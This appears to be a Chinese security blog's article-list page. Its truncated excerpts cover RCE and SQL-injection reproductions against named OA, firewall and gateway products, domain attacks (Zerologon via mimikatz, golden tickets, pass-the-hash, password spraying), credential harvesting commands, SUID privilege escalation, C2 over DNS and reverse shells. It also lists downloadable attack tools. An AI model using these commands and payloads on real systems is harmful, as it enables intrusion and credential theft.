自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(31)
  • 资源 (9)
  • 收藏
  • 关注

原创 奇安信 网康下一代防火墙 RCE复现

奇安信 网康下一代防火墙 RCE漏洞描述奇安信 网康下一代防火墙存在远程命令执行,通过漏洞攻击者可以获取服务器权限漏洞影响奇安信 网康下一代防火墙FOFAapp=“网康科技-下一代防火墙”漏洞复现登录页面如下发送如下请求包POST /directdata/direct/router HTTP/1.1Host: Connection: closeContent-Length: 179Cache-Control: max-age=0sec-ch-ua: "Google Chrom

2021-04-13 11:25:29 1794

原创 2021-泛微OA V8 SQL注入漏洞

泛微OA V8 SQL注入漏洞漏洞描述泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限漏洞影响泛微OA V8FOFAapp=“泛微-协同办公OA”漏洞复现在getdata.jsp中,直接将request对象交给weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) :方法处理在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法P

2021-04-13 09:06:42 12355 3

原创 华丽的伪装--dns协议上线你的c2

dns beacon上线cobale环境介绍cs4.1vps域名1:部署域名解析首先,用一台公网VPS作为C2(注意:VPS的53端口一定要开),并准备好一个可以配置的域名。然后,去配置域名的记录。首先创建记录A,将自己的域名 www.xxx.com解析到VPS服务器地址。然后,创建NS记录,将 ns1.xxx.com 指向 www.xxx.com第一条A类解析是在告诉域名系统,www.xxx.com 的IP地址是 xx.xx.xx.xx第二条NS解析是在告诉域名系统,想要知道 ns1.

2021-04-12 15:13:52 1591

原创 和信创天云桌面任意文件上传

这里写自定义目录标题和信创天云桌面文件上传getshell和信创天云桌面文件上传getshell漏洞地址http://xx.xx.xx.xx/Upload/upload_file.php存在漏洞构造post包POST https://x.x.x.x/Upload/upload_file.php?l=../test HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (

2021-04-12 10:36:29 351

原创 linnx环境变量提权

linnx环境变量提权这个手法平时使用有点鸡肋,但是还是分享一下前提是管理员要配置了suid权限的目录或文件现在我们的当前目录是/home/hack/script,我们将在当前目录下创建一个srcipt目录。然后cd到script目录中,编写一个简单的c程序来调用系统二进制文件的函数。pwdmkdir scriptcd /scriptvim demo.c#include<unistd.h>void main(){ setuid(0); setgid(0); syst

2021-05-31 13:35:24 363

原创 域渗透-用户枚举和密码喷洒

域渗透-用户枚举和密码喷洒在 Kerberos 协议认证的 AS-REQ 阶段,cname 的值是用户名。当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对域内进行域用户枚举和密码喷洒攻击域内用户枚举当主机不在域内时,我们可以通过域内用户枚举来探测域内的用户。我们可以使用Kerbrute工具进行探测。工具地址:https://github.com/ropnop/kerbrutekerbrute_windows_amd64.exe

2021-05-06 17:46:54 1120

原创 RDP凭据获取继续横向

RDP凭据获取继续横向文章目录RDP凭据获取继续横向猕猴桃获取密码network password通过powershell脚本猕猴桃获取密码有可能这台机器保存登录其他机器rdp#查看mstsc的连接纪录cmdkey /list #查找本地的Credentials:dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*如果存在,可以使用mimikatz记录这个值mimikatz.exe "privilege::debug"

2021-05-06 15:49:35 283

原创 Linux kernel权限提升漏洞

Linux kernel权限提升漏洞 CVE-2021-3493漏洞描述Ubuntu OverlayFS Local PrivescCVE-2021-3493 EXP在Github被公开,可以通过EXP在Ubuntu多个影响系统中提升 ROOT权限漏洞影响[!NOTE]Ubuntu 20.10Ubuntu 20.04 LTSUbuntu 18.04 LTSUbuntu 16.04 LTSUbuntu 14.04 ESM漏洞复现查看linux发现版本cat /etc/issu

2021-04-23 10:50:42 512

原创 致远OA 组合getshell

致远OA通杀 最新组合getshell复现版本:致远A6-V5协同管理软件.A6 V7.1SP1Getshell 分三步1.获取cookie信息 2.上传压缩文件 3.解压压缩文件得到shell1.获取 cookie漏洞地址/seeyon/thirdpartyController.do数据包:POST /seeyon/thirdpartyController.do HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10

2021-04-21 09:56:26 4783 3

原创 佑友防火墙 后台命令执行漏洞

佑友防火墙 后台命令执行漏洞漏洞描述佑友防火墙 后台维护工具存在命令执行,由于没有过滤危险字符,导致可以执行任意命令漏洞影响命令执行漏洞复现登录页面如下默认账号密码为User: adminPass:关注私信密码登录后台 系统管理 --> 维护工具 --> Ping命令执行漏洞的原理:在操作系统中, & 、&& 、| 、 || 都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径

2021-04-21 09:43:08 340 1

原创 360天擎sql注入&&未授权访问

天擎 前台SQL注入漏洞描述天擎 存在SQL注入,攻击者可以通过漏洞上传木马FOFA指纹title=“360新天擎”漏洞复现漏洞地址/api/dp/rptsvcsyncpoint?ccid=1注入写shell:sqlmappython sqlmap.py -u https://x.x.x.x:8443/api/dp/rptsvcsyncpoint?ccid=1 --dbms PostgreSQL天擎 数据库信息泄露漏洞漏洞描述天擎 存在未授权越权访问,造成敏感信息泄露漏洞复现

2021-04-14 12:45:40 3462

原创 权限维持-域渗透攻击-Golden Ticket (黄金票据)

Golden Ticket (黄金票据)简义 :在拥有普通域用户权限和 krbtgt账号的hash的情况下,获取域管理员权限。发生在上面的过程3,可以伪造TGT(前提是获取krbtgt账号的口令散列值(hash)),宣称自己是域内任何账号,包括域管或者不存在的用户。1. 首先,黄金票据是全功能的TGT。也就意味着万能票据可用于Kerberos认证的任何服务。票据授予服务盲目地相信TGT中的信息,然后处理TGT并颁发服务票据。内存中插入黄金票据并不需要提升权限。而且默认情况下,黄金票据的有效期是10

2021-04-13 07:41:48 1626

原创 域渗透攻击-Pass the Ticket 攻击(票据传递)

Pass the Ticket 攻击(票据传递)1.ms14-068​ 限制条件:打了补丁或者域中有Win2012/2012R2 域控1.首先在域控检测是否有MS14-068这个漏洞,通过查看是否打补丁(KB3011780)来判断是否存在漏洞,下图可以看到没有打MS14-068漏洞相关的补丁systeminfo测试访问域控的C盘共享,访问被拒绝3.为了使我们生成的票据起作用,首先我们需要将内存中已有的kerberos票据清除​ mimikatzkerberos::purge​

2021-04-13 07:36:22 878

原创 看我横向打你内网--Pth&&Ptk

Pass the Hash&&Pass The Key微软在2014年5月13日发布了针对Pass The Hash的更新补丁kb2871997在域环境中,利用pass the hash的渗透方式往往是这样的:获得一台域主机的权限Dump内存获得用户hash通过pass the hash尝试登录其他主机继续搜集hash并尝试远程登录直到获得域管理员账户hash,登录域控,最终成功控制整个域下面简要介绍一下Pass The Hash技术发展的几段历史1、2012年12月

2021-04-13 07:27:24 217

原创 看我拿下域控之利用mimikatz打cve2020-1472

利用mimikatz利用cve2020-1472原理在上一节说了,本章不多提,主要介绍mimikatz利用方式检测目标机是否存在cve2020-1472 lsadump::zerologon /target:域控IP /account:域控主机名$lsadump::zerologon /target:192.168.18.20 /account:WIN-H06K3JJM9AO$清空域控密码lsadump::zerologon /target:域控IP /account:域控主机名$

2021-04-13 07:09:05 1155

原创 看我拿下域控-cve2020-1472-Netlogon

cve2020-1472文章目录cve2020-1472简介影响版本环境简介DCAttack漏洞验证漏洞利用利用复现环境配置安装Impacket下载EXP置空密码获取HASH获取SHELL获取原HASH解HASH恢复HASH检查是否恢复简介2020年8月11号,微软修复了Netlogon 特权提升漏洞,当攻击者使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器连接的易受攻击的 Netlogon 安全通道时,存在特权提升漏洞。成功利用此漏洞的攻击者可以在网络中的设备上运行经特殊设计的应

2021-04-13 07:05:07 407

原创 内网穿透工具-venom

venom反向连接和正向连接admin节点和agent节点均可监听连接也可发起连接admin监听端口,agent发起连接:./admin_macos_x64 -lport 9999./agent_linux_x64 -rhost 192.168.0.103 -rport 9999agent监听端口,admin发起连接:./agent_linux_x64 -lport 8888./admin_macos_x64 -rhost 192.168.204.139 -rport 8888网络拓扑

2021-04-12 15:22:21 1094

原创 渗透测试工具

介绍渗透测试工具备忘单,这是典型渗透测试约定的快速参考高级概述。设计为快速参考备忘单,它提供了第三方笔测试公司在执行手动基础结构渗透测试时将要运行的典型命令的高级概述。有关更多详细信息,我建议使用该工具的手册文件,或者从右侧菜单中选择更具体的笔测试备忘单。ifconfig eth0 xxx.xxx.xxx.xxx/24子网划分ipcalc xxx.xxx.xxx.xxx/24ipcalc xxx.xxx.xxx.xxx 255.255.255.0OSINT被动信息收集域名解析WHOIS枚举

2021-04-12 15:15:21 333

原创 ssrf漏洞笔记

ssrf漏洞文章目录**ssrf漏洞**漏洞原理ssrf作用漏洞验证漏洞利用绕过SSRF过滤的几种方法ssrf挖掘点挖掘思路图漏洞原理SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。很多Web应用都提供了从其他服务器上获取数据的功能。使用用户指定的URL,Web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web

2021-04-12 14:49:37 185

原创 锐捷网关 RCE复现

请求路径/guest_auth/guestIsUp.php漏洞文件<?php //查询用户是否上线了 $userip = @$_POST['ip']; $usermac = @$_POST['mac']; if (!$userip || !$usermac) { exit; } /* 判断该用户是否已经放行 * $cmd = '/sbin/app_auth_hook.elf -f ' . $userip; $r.

2021-04-12 11:09:03 2729

原创 fastjson 1.2.24反序列化漏洞复现

简介fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。在Java 8u102环境下,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。环境靶机:http://192....

2020-05-07 14:36:58 613

原创 解决 docker中 error:Couldn't connect to Docker daemon at http+docker://localunixsocket - is it running?

安装完docker后执行:toor@1:/vulhub/flask/ssti$ docker-compose up -d显示ERROR: Couldn't connect to Docker daemon at http+docker://localunixsocket - is it running?正确的是将当前用户加入docker组toor@1:/vulhub/nginx/i...

2020-04-14 15:53:03 234

原创 反弹shell

什么是反弹shell?简单理解,通常是我们主动发起请求,去访问服务器某个IP的某个端口,比如我们常访问的web服务器:http/https://ip:80,这是因为在服务器上面开启了80端口的监听,我们去访问它的时候,就会给我们建立连接。而现在所谓的反弹shell指的是反过来在我们自己的公网vps建立监听,然后让服务器反弹一个shell来连接我们自己的主机,然后我们就能通过反弹的shell去远程...

2020-04-14 13:21:41 314

原创 linux:SUID、SGID详解

一、UNIX下关于文件权限的表示方法和解析SUID 是 Set User IDSGID 是 Set Group IDUNIX下可以用ls -l命令来看到文件的权限。用ls命令所得到的表示法的格式是类似这样的:-rwxr-xr-x 。下面解析一下格式所表示的意思。这种表示方法一共有十位:9 8 7 6 5 4 3 2 1 0r w x r - x r - x第9位表示文件类型,可以为p...

2020-04-14 12:46:47 290

原创 渗透前期准备-全方位信息收集

信息收集内容及一些工具信息收集信息收集分为两种:主动收集:通过直接访问、扫描网站,这种流量将流经网站被动收集:利用第三方的服务对目标进行访问了解,比例:Google搜索、Shodan搜索等域名信息收集当我们确定了渗透的目标(域名)时,接下来我们需要收集域名对应的IP,whois信息和子域名等信息。寻找对应的ip:首先,我们要判断该域名是否存在CDN的情况,我们可以去在线CDN查询...

2020-03-27 17:25:22 253

原创 信息收集

信息收集概念信息收集是指黑客为了更加有效地实施渗透攻击而在攻击前或攻击过程中对目标的所有探测活动。信息收集作用1.了解组织安全架构2.缩小攻击范围3.描绘网络拓扑4.建立脆弱点数据库信息收集分类(1)主动信息搜集:与目标主机进行直接交互,从而拿到目标信息,缺点是会记录自己的操作信息。(2)被动信息搜集:不与目标主机进行直接交互,通过搜索引擎或者社会工程等方式间接的获取目标主机的信...

2020-03-27 16:17:25 457

原创 hashcat中文文档

hashcat 中文文档描述hashcat是世界上最快,最先进的密码恢复工具。此版本结合了以前基于CPU的hashcat(现在称为hashcat-legacy)和基于GPU的oclHashcat。Hashcat被公布为下开源软件MIT许可证。当前版本当前版本是5.1.0。资源主页:https://hashcat.net/hashcat/支持论坛:https://hashcat.n...

2020-03-25 14:36:05 2915

原创 google hacking常用语法

之前从别人那了解到一个关于大学类的SRC可以访问这里EDU-SRC,因此最近也开始学习总结测学校类方式.前言:不多赘述关于非法攻击等之类的非法行为会被请去喝茶等问题,总之,一切为自己考虑,不要“日站一时爽,进去万分悔”.一、信息收集当我们确定待测学习后,自然少不了针对此系统的一系列信息收集工作;关于子域名爆破也好、还是通过其他类端口探测等收集方式也好,而我这里全程只使用Google Hac...

2020-03-24 21:34:18 1385

原创 OWASP top 10 漏洞的总结笔记

这里简单地写一些关于OWASP top 10 漏洞的一些利用技巧以及检测方法、防御方法等的笔记(很多是参考了《Web漏洞讲解》),有新的理解和学会好的方法之后会更新~转载 http://blog.csdn.net/SKI_12/article/details/69952026SQL Injection&Blind SQL Injection(SQL注入与SQL盲注漏洞):一、绕过WA...

2020-03-24 21:01:53 360

原创 端口子域名扫描

2020年1月9号今天主要是说了一些端口扫描以及子域名扫描的工具介绍,以及应用router Scan使用

2020-01-13 11:18:53 390

原创 ms17-010 ms10-046 ms08-067漏洞利用

2020年1月7日好了,到了第二天,早上起来的时候心情就是那么的激动为什么呢,昨天熬夜到3点,终于吧环境搞好了,哎,我太难了!今天一天主要做的事情是利用kali进行漏洞利用,具体利用过程和步骤如下:ms17-010,ms08-067,ms10-046漏洞利用一. ms17-0101.漏洞成因:当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个...

2020-01-13 10:44:35 1664

8uFtp.zip超好用简单的ftp软件

8UFTP是一款功能强大的FTP客户端工具。8uftp软件体积小巧,占用系统资源少,操作简单易上手,功能实用且便捷,支持在线解压缩,可以管理多个ftp站点,为用户带来高效便捷的使用体验。

2020-03-24

Xshell Plus.zip

Xshell [1] 是一个强大的安全终端模拟软件,它支持SSH1, SSH2, 以及Microsoft Windows 平台的TELNET 协议。Xshell 通过互联网到远程主机的安全连接以及它创新性的设计和特色帮助用户在复杂的网络环境中享受他们的工作。 Xshell可以在Windows界面下用来访问远端不同系统下的服务器,从而比较好的达到远程控制终端的目的。除此之外,其还有丰富的外观配色方案以及样式选择。

2020-03-24

Navicat.zip压解可用

Navicat [1] 是一套快速、可靠并价格相宜的数据库管理工具, 专为简化数据库的管理及降低系统管理成本而设。它的设计符合数据库管理员、开发人员及中小企业的需要。Navicat 是以直觉化的图形用户界面而建的,让你可以以安全并且简单的方式创建、组织、访问并共用信息。 Navicat是闻名世界、广受全球各大企业、政府机构、教育机构所信赖,更是各界从业员每天必备的工作伙伴。自2001 年以来,Navicat 已在全球被下载超过 2,000,000 次,并且已有超过 70,000 个用户的客户群。《财富》世界 500 强中有超过 100 家公司也都正在使用 Navicat。 Navicat提供多达 7 种语言供客户选择,被公认为全球最受欢迎的数据库前端用户界面工具。 它可以用来对本机或远程的 MySQL、SQL Server、SQLite、Oracle 及 PostgreSQL 数据库进行管理及开发。 Navicat的功能足以符合专业开发人员的所有需求,而且对数据库服务器的新手来说又相当容易学习。有了极完备的图形用户界面 (GUI),Navicat 让你可以以安全且简单的方法创建、组织、访问和共享信息。 Navicat适用于三种平台 - Microsoft Windows、Mac OS X 及Linux。它可以让用户连接到任何本机或远程服务器、提供一些实用的数据库工具如数据模型、数据传输、数据同步、结构同步、导入、导出、备份、还原、报表创建工具及计划以协助管理数据。

2020-03-24

NetFuke.zip

1、ARP欺骗:支持单向和双向欺骗,支持mac指定(不建议对500KB/s以上流量的机器进行欺骗) 2、ICMP欺骗:欺骗目标机器发向特定IP的数据报(对Xp,Win2003或以上无效) 3、插件功能:支持过滤器,分析器,修改器,支持启用,禁用,排序 4、数据包转发:支持程序主动转发,不转发 5、网卡选择:可以任选一个网卡监听 6、数据包缓冲:支持0­20M的缓冲区,支持缓冲区回显,缓冲区自动保存 7、离线数据包扫描:支持离线状态,加载插件扫描数据包 8、保存选中的数据包数据:支持将缓冲区数据包保存成NetFuke能加载的数据文件 9、保存选中的数据包数据区:支持过滤并连携保存数据包数据区,只支持TCP,UDP数据区连携 10、数据包有效性设置:可以设置数据包的有效性,规避数据包扫描,保存 11、分析日志,解码日志:支持日志保存 12、网络监视:显示网络主机列表,IP,MAC 工具仅供学习,不得用于违法用途

2020-03-24

jd-guijava逆向工具.zip

一、支持众多Java编译器的反编译; 二、支持对整个Jar文件进行反编译,JD-GUI中文版可直接点击进行相关代码的跳转; 软件比较 JD-Core 是一个免费的库,从一个或多个“.class”文件中 重构Java源代码。JD-Core可以用来恢复丢失的源代码,并深究Java运行时类库。支持Java 5的功能:如注释,泛型或枚举 。JD-GUI 和 JD-Eclipse都包括JD-Core。 JD-GUI 是一个独立的显示“.class” 文件Java源代码的图形用户界面工具。您可以使用JD-GUI浏览和重建源代码的即时访问方法和字段,以代码高度方式来显示反编译过来的代码。

2020-03-24

CDlinux_0.9.7.1_带超级权限(minidwep-gtk-30513等).rar

使用的是pin穷举方法 方法1:使用minidwep-gtk,打开后选加密方式wap/wap2,点扫描,看路由名称、信道后面有没有wps,有的话,点reaver,点ok。之后就是漫长的破解。 方法2:使用inflator1.0,选yes,之后选网卡,再选next,之后选Scanfor,选路由,点next,然后勾第一个。点run由于破解漫长,需要保存进度,创建虚拟机快照,到时恢复。

2020-03-24

网络执法官局域网管理.7z

自动侦测 管理员登记完或软件自动检测到所有合法的主机后,可在软件中作出设定,拒绝所有未登记的主机接入网络。一旦有未登记主机接入,软件会自动将其MAC、IP、主机名、上下线时段等信息作永久记录,并可采用声音、向指定主机发消息等多种方式报警,还可以根据管理员的设定,自动对该主机采取IP冲突、与关键主机隔离、与网络中所有其它主机隔离等控制措施。 限定主机IP 管理员可对每台主机指定一个IP或一段IP,当该主机采用超出范围的IP时,软件会判定其为“非法用户”,自动采用管理员事先指定的方式对其进行控制,并将其MAC、IP、主机名作记久记录备查。管理员可事先指定对非法用户实行IP冲突、与关键主机隔离、与其它所有主机隔离等管理方式。 [1] 限定连接时段 管理员可指定每台主机在每天中允许与网络连接的时段或不允许与网络连接的时段(可指定两个时段,如允许每天8:30-12:00和13:30-17:00与网络连接),并可指定每一用户是否被允许在每个周六、周日与网络连接。对违反规定的用户,软件判其为非法用户,自动记录并采用管理员事先指定的方式进行管理。管理方式同样可为IP冲突、与关键主机隔离、与其它所有主机隔离等。 该软件的主要功能是依据管理员为各主机限定的权限,实时监控整个局域网,并自动对非法用户进行管理,可将非法用户与网络中某些主机或整个网络隔离,而且无论局域网中的主机运行何种防火墙,都不能逃避监控,也不会引发防火墙警告,提高了网络安全性。管理员只需依据实际情况,设置各主机的权限及违反权限后的管理方式,即可实现某些具体的功能,如禁止某些主机在指定的时段访问外网或彻底禁止某些主机访问外网;保护网络中关键主机,只允许指定的主机访问等等。 [2]

2020-03-24

干净hydra.zip

hydra支持的服务有:         POP3,SMB,RDP,SSH,FTP,POP3,Telnet,MYSQL...(举例一些常用的服务) 使用方法# -l 指定单个用户名,适合在知道用户名爆破用户名密码时使用 -L 指定多个用户名,参数值为存储用户名的文件的路径(建议为绝对路径) -p 指定单个密码,适合在知道密码爆破用户名时使用 -P 指定多个密码,参数值为存贮密码的文件(通常称为字典)的路径(建议为绝对路径) -C 当用户名和密码存储到一个文件时使用此参数。注意,文件(字典)存储的格式必须为 &quot;用户名:密码&quot; 的格式。 -M 指定多个攻击目标,此参数为存储攻击目标的文件的路径(建议为绝对路径)。注意:列表文件存储格式必须为 &quot;地址:端口&quot; -t 指定爆破时的任务数量(可以理解为线程数),默认为16 -s 指定端口,适用于攻击目标端口非默认的情况。例如:http服务使用非80端口 -S 指定爆破时使用 SSL 链接 -R 继续从上一次爆破进度上继续爆破 -v/-V 显示爆破的详细信息 -f 一但爆破成功一个就停止爆破 server 代表要攻击的目标(单个),多个目标时请使用 -M 参数 service 攻击目标的服务类型(可以理解为爆破时使用的协议),例如 http ,在hydra中,不同协议会使用不同的模块来爆破,hydra 的 http-get 和 http-post 模块就用来爆破基于 get 和 post 请求的页面 OPT 爆破模块的额外参数,可以使用 -U 参数来查看模块支持那些参数,例如命令:hydra -U http-get

2020-03-18

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除